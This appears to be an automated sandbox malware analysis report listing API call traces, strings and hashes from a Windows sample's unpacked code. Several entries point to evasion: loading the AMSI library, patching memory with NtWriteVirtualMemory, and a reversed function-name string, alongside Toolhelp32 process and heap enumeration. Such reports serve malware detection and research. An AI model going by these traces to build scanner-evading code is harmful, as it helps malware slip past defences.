                          • Part of subcall function 028580C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02858113
                          • Part of subcall function 028580C0: GetProcAddress.KERNEL32(?,?), ref: 02858125
                        • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02857D6C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                        • String ID: Ntdll$yromeMlautriVetirW
                        • API String ID: 2719805696-3542721025
                        • Opcode ID: 09cb4b008d6c90edd18e75a7310debff8c7dad6b2d1bf2b6ea9c0da1f80046bd
                        • Instruction ID: f706feb0505ba6306ff6d6d43a2503a9d1f60b3f8cdceb713a052c8f6e9d0423
                        • Opcode Fuzzy Hash: 09cb4b008d6c90edd18e75a7310debff8c7dad6b2d1bf2b6ea9c0da1f80046bd
                        • Instruction Fuzzy Hash: 4A014C7C640218AFEB10EF98D841EAEBBEDEB4D710F518850BD00D7694DA74A9148F61

                        Control-flow Graph

                        APIs
                          • Part of subcall function 02856CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02856D39,?,?,?,00000000), ref: 02856D19
                        • CoCreateInstance.OLE32(?,00000000,00000005,02856E2C,00000000,00000000,02856DAB,?,00000000,02856E1B), ref: 02856D97
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: CreateFromInstanceProg
                        • String ID:
                        • API String ID: 2151042543-0
                        • Opcode ID: 24f8876d330572c559f7616e3cbdd5f0f52bcdc16ed17bc03f3bf2de5412efec
                        • Instruction ID: 2fd08f2014e768fc407adfe1d391376f911e620f9b1e602a898c152d5623552f
                        • Opcode Fuzzy Hash: 24f8876d330572c559f7616e3cbdd5f0f52bcdc16ed17bc03f3bf2de5412efec
                        • Instruction Fuzzy Hash: 5901F77D608728AFF715DF64DC1296FBBADE749B10BE10835F901E2640FA359D00C865

                        Control-flow Graph

                        APIs
                        • Sleep.KERNEL32(00000000), ref: 028417D0
                        • Sleep.KERNEL32(0000000A,00000000), ref: 028417E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 7640db97b83190891a60d56592c7567d38a4049a69f964a7f0626078e9c83061
                        • Instruction ID: 2dc02cb14d263af323e39ee7b0f846205baa2a715f0e5e67937d6bc1dd411aeb
                        • Opcode Fuzzy Hash: 7640db97b83190891a60d56592c7567d38a4049a69f964a7f0626078e9c83061
                        • Instruction Fuzzy Hash: 24B1367EA003949BC719CF28E8C8365BBE1EB94314F18866ED54DCB3C5DB7094A5CB90

                        Control-flow Graph

                        APIs
                        • LoadLibraryW.KERNEL32(amsi), ref: 0285870D
                          • Part of subcall function 028580C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02858148,?,?,00000000,00000000,?,02858061,00000000,KernelBASE,00000000,00000000,02858088), ref: 0285810D
                          • Part of subcall function 028580C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02858113
                          • Part of subcall function 028580C0: GetProcAddress.KERNEL32(?,?), ref: 02858125
                          • Part of subcall function 02857CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02857D6C
                        • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0285876C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                        • String ID: DllGetClassObject$W$amsi
                        • API String ID: 941070894-2671292670
                        • Opcode ID: 51987e6f8be701a36839f7915221bf68b74c4a55278cb47817d6976c06f1fd9a
                        • Instruction ID: fa3ed2d19b4251b84c1b97ea4ee0405d0a04209a27595b4d9ee38ac4c18df085
                        • Opcode Fuzzy Hash: 51987e6f8be701a36839f7915221bf68b74c4a55278cb47817d6976c06f1fd9a
                        • Instruction Fuzzy Hash: FFF0C85844C391BAE201E67C8C45F4BBFCD4B52224F04CA0DB5E8D62D2D679D1048BB7

                        Control-flow Graph

                        APIs
                        • Sleep.KERNEL32(00000000,?,?,00000000,02841FE4), ref: 02841B17
                        • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02841FE4), ref: 02841B31
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: b1594da80cfccb674f5a0b00b92519992f70a26ca0d9a6f1b108386db14ad500
                        • Instruction ID: cfbf5778518d09f946af85368b8061f0c8abd31d05350940ff7a815ac215478b
                        • Opcode Fuzzy Hash: b1594da80cfccb674f5a0b00b92519992f70a26ca0d9a6f1b108386db14ad500
                        • Instruction Fuzzy Hash: 7E51C07DA012448FD715CF6CD988766BBD0AB45318F1885AEE94CCB2C6EF70C495CBA1

                        Control-flow Graph

                        APIs
                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0285E86A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: CheckConnectionInternet
                        • String ID: Initialize$OpenSession$ScanBuffer
                        • API String ID: 3847983778-3852638603
                        • Opcode ID: 905ee7c21354ddbd8c8276bcdcb2e3bfb3802b944bfa4e2cf55e94c7f5c9d0f5
                        • Instruction ID: ba7237dab580b62d71bbb1b18d7a66a365d3579701395d63d9cbf1fd7801dc6b
                        • Opcode Fuzzy Hash: 905ee7c21354ddbd8c8276bcdcb2e3bfb3802b944bfa4e2cf55e94c7f5c9d0f5
                        • Instruction Fuzzy Hash: 4F41EE3DA1021C9BEB10EBA8DC81B9E77FAEF49710F214425E841E7655DE78AE058F11

                        Control-flow Graph

                        APIs
                        • LoadLibraryA.KERNEL32(00000000,00000000,02858903), ref: 02858850
                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02858903), ref: 02858860
                        • GetProcAddress.KERNEL32(75380000,00000000), ref: 02858879
                          • Part of subcall function 02857CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02857D6C
                        • FreeLibrary.KERNEL32(75380000,00000000,028A2388,Function_000065D8,00000004,028A2398,028A2388,000186A3,00000040,028A239C,75380000,00000000,00000000,00000000,00000000,02858903), ref: 028588E3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                        • String ID:
                        • API String ID: 1543721669-0
                        • Opcode ID: 6c189d0d2ac18ba7a4474130e305bf849e9444c00f486f6dfbd41f583bb36df9
                        • Instruction ID: a6810f23c2cb5b171a8fe0782988fb71fcf1d4de2943108c26d3967e20f40c82
                        • Opcode Fuzzy Hash: 6c189d0d2ac18ba7a4474130e305bf849e9444c00f486f6dfbd41f583bb36df9
                        • Instruction Fuzzy Hash: A9118E7CA4031CABF710FBBCCC11A1E7BAAEB46700F4144257E04EB7A4DEB899109B16

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 5be27f8e7e19bdddb7f97ed2a659d6bafc129b935fc5d2ca92871270816a055b
                        • Instruction ID: d166de27976c9e591bd5c83aac2ffb0d74cc8d98b3d5a63d92fee7bdd57f61bd
                        • Opcode Fuzzy Hash: 5be27f8e7e19bdddb7f97ed2a659d6bafc129b935fc5d2ca92871270816a055b
                        • Instruction Fuzzy Hash: 5EF0623C70921CC7DB367B3C8984669679A7F4471D75C5476B80ADB205CF249C05CB63

                        Control-flow Graph

                        APIs
                        • SysFreeString.OLEAUT32(?), ref: 0285735A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: FreeString
                        • String ID: H
                        • API String ID: 3341692771-2852464175
                        • Opcode ID: aa64ff81d18bc59e96d5acb9b514b64f253319f62e6436bb0f8b23b07f1db74e
                        • Instruction ID: 8f205081cea5fb1bace76f69607664a8b8e7cef359195f11ff3c6e2e87500ae0
                        • Opcode Fuzzy Hash: aa64ff81d18bc59e96d5acb9b514b64f253319f62e6436bb0f8b23b07f1db74e
                        • Instruction Fuzzy Hash: 1CB1C078A016189FDB14CF99D980AADFBF6FF49314F648169E80AEB364D730A845CF50

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: InitVariant
                        • String ID:
                        • API String ID: 1927566239-0
                        • Opcode ID: 384f48b63f6c7abfb00c4ec8576c7358671a2867bc2708c5b905f8cfe7f23507
                        • Instruction ID: 6ebd5aa8ba869757b71ded20f18f0ba7001d20a7e7ec14862c10a040d20c88e5
                        • Opcode Fuzzy Hash: 384f48b63f6c7abfb00c4ec8576c7358671a2867bc2708c5b905f8cfe7f23507
                        • Instruction Fuzzy Hash: 4D31507D60061CAFDB11DFACC884AAA77A8FB0C708F8845A1E909D3640DB34D950CB62
                        APIs
                        • CLSIDFromProgID.OLE32(00000000,?,00000000,02856D39,?,?,?,00000000), ref: 02856D19
                          • Part of subcall function 02844C0C: SysFreeString.OLEAUT32(0285ED84), ref: 02844C1A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: FreeFromProgString
                        • String ID:
                        • API String ID: 4225568880-0
                        • Opcode ID: 5087ba58ea1c9190a7b6f558db69c0a701099273c52a6be6fddd24f184811dc4
                        • Instruction ID: 1278a9ea28dada73efc882a44e328bc4237826926ab77ccf946a32265f908063
                        • Opcode Fuzzy Hash: 5087ba58ea1c9190a7b6f558db69c0a701099273c52a6be6fddd24f184811dc4
                        • Instruction Fuzzy Hash: E0E06D7D604368BFF711EBA9CC52A5A77ADDB89B10B9108B1A800D7600EA75BE008866
                        APIs
                        • GetModuleFileNameA.KERNEL32(02840000,?,00000105), ref: 02845832
                          • Part of subcall function 02845A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02840000,0286E790), ref: 02845A94
                          • Part of subcall function 02845A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02840000,0286E790), ref: 02845AB2
                          • Part of subcall function 02845A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02840000,0286E790), ref: 02845AD0
                          • Part of subcall function 02845A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02845AEE
                          • Part of subcall function 02845A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02845B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02845B37
                          • Part of subcall function 02845A78: RegQueryValueExA.ADVAPI32(?,02845CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02845B7D,?,80000001), ref: 02845B55
                          • Part of subcall function 02845A78: RegCloseKey.ADVAPI32(?,02845B84,00000000,?,?,00000000,02845B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02845B77
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Open$FileModuleNameQueryValue$Close
                        • String ID:
                        • API String ID: 2796650324-0
                        • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                        • Instruction ID: 14e444ed7bb87888b056900b454d4173112a3f5da1ddce64108a1a5b7448e489
                        • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                        • Instruction Fuzzy Hash: CAE06D79A002188BCB10DE5CC8C0A4B37D8AB09750F400565EC58DF34AEB74E9608BD1
                        APIs
                        • GetFileAttributesA.KERNEL32(00000000,?,0285FD00,ScanString,028A237C,0286B40C,OpenSession,028A237C,0286B40C,ScanString,028A237C,0286B40C,UacScan,028A237C,0286B40C,UacInitialize), ref: 02847E1B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                        • Instruction ID: fa62294ca95daa0ce887f5b9f16be9fcf88b110a87ee3e591fa93e3b9f1875ab
                        • Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                        • Instruction Fuzzy Hash: 90C08CEC31220A0B1A54A1FC1CC412A428809051393A42F21E23CDA2E2EF21C8232421
                        APIs
                        • SysFreeString.OLEAUT32(0285ED84), ref: 02844C1A
                        • SysReAllocStringLen.OLEAUT32(0286C2B4,0285ED84,000000B4), ref: 02844C62
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: String$AllocFree
                        • String ID:
                        • API String ID: 344208780-0
                        • Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                        • Instruction ID: 992a72e41bdb70e8ec8df5579188c3a9ebb617a035e10c67d96d9b86f93f34e2
                        • Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                        • Instruction Fuzzy Hash: 0DD012BC50410D5FBA2C99D94544B36626A99D030A74CC659980ACA241FF319540CA31
                        APIs
                        • timeSetEvent.WINMM(00002710,00000000,0286BF78,00000000,00000001), ref: 0286BF94
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Eventtime
                        • String ID:
                        • API String ID: 2982266575-0
                        • Opcode ID: 22ff24b22d08d2e8fc0eb83f5ef63db918273aceb48ce2c93082b58948fe3e09
                        • Instruction ID: 13b082c0cf8734e72fa4723ceb32459721d90ea37e3e3bd2dd17b83bcf2defc7
                        • Opcode Fuzzy Hash: 22ff24b22d08d2e8fc0eb83f5ef63db918273aceb48ce2c93082b58948fe3e09
                        • Instruction Fuzzy Hash: 16C048E87893407EFA1097AE2CC2F37118DD704B15F600462BB00EA2D1D5E259504A20
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02841A03), ref: 028415E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 79cd1e680c05e8f9d8f57dec7486c5f93c8c040e4b9da2c56e803f683b3dfb03
                        • Instruction ID: c2568638c47f29a24e3414af2f8e90da44653d31cd9c4b7862a76aa0460c97d9
                        • Opcode Fuzzy Hash: 79cd1e680c05e8f9d8f57dec7486c5f93c8c040e4b9da2c56e803f683b3dfb03
                        • Instruction Fuzzy Hash: A8F06DF8B413406FDB09CF7999843417BD2EB89344F188579E70ADB7C8EB7284118B00
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 028416A4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 3af4aaade2d757745f4fcc3c577d2a12301a4c0dd26fcb28c101e8940dac7f96
                        • Instruction ID: 04f163276812d0acc7d306348cb905fd3a8c1bf56a0f5ec8ca8b21134d118e20
                        • Opcode Fuzzy Hash: 3af4aaade2d757745f4fcc3c577d2a12301a4c0dd26fcb28c101e8940dac7f96
                        • Instruction Fuzzy Hash: B1F090BEB446996BE7109E5A9C88792BBA4FB00355F054139EA0CD7384DB70A850CB94
                        APIs
                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02841FE4), ref: 02841704
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: da8d427602b5fa85a47669f57f4d8db9e56fff91cc3d5b4f38d1a549179dfde8
                        • Instruction ID: 3592e79acd99295c0d508f553e265953b71954f94249768bfab69a2f27d0a2af
                        • Opcode Fuzzy Hash: da8d427602b5fa85a47669f57f4d8db9e56fff91cc3d5b4f38d1a549179dfde8
                        • Instruction Fuzzy Hash: B4E0867D3003156FE7105A7D5D88B12ABD8EB54654F144475F509DB286DB60E8508B64
                        APIs
                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0285ABDB,?,?,0285AC6D,00000000,0285AD49), ref: 0285A968
                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0285A980
                        • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0285A992
                        • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0285A9A4
                        • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0285A9B6
                        • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0285A9C8
                        • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0285A9DA
                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0285A9EC
                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0285A9FE
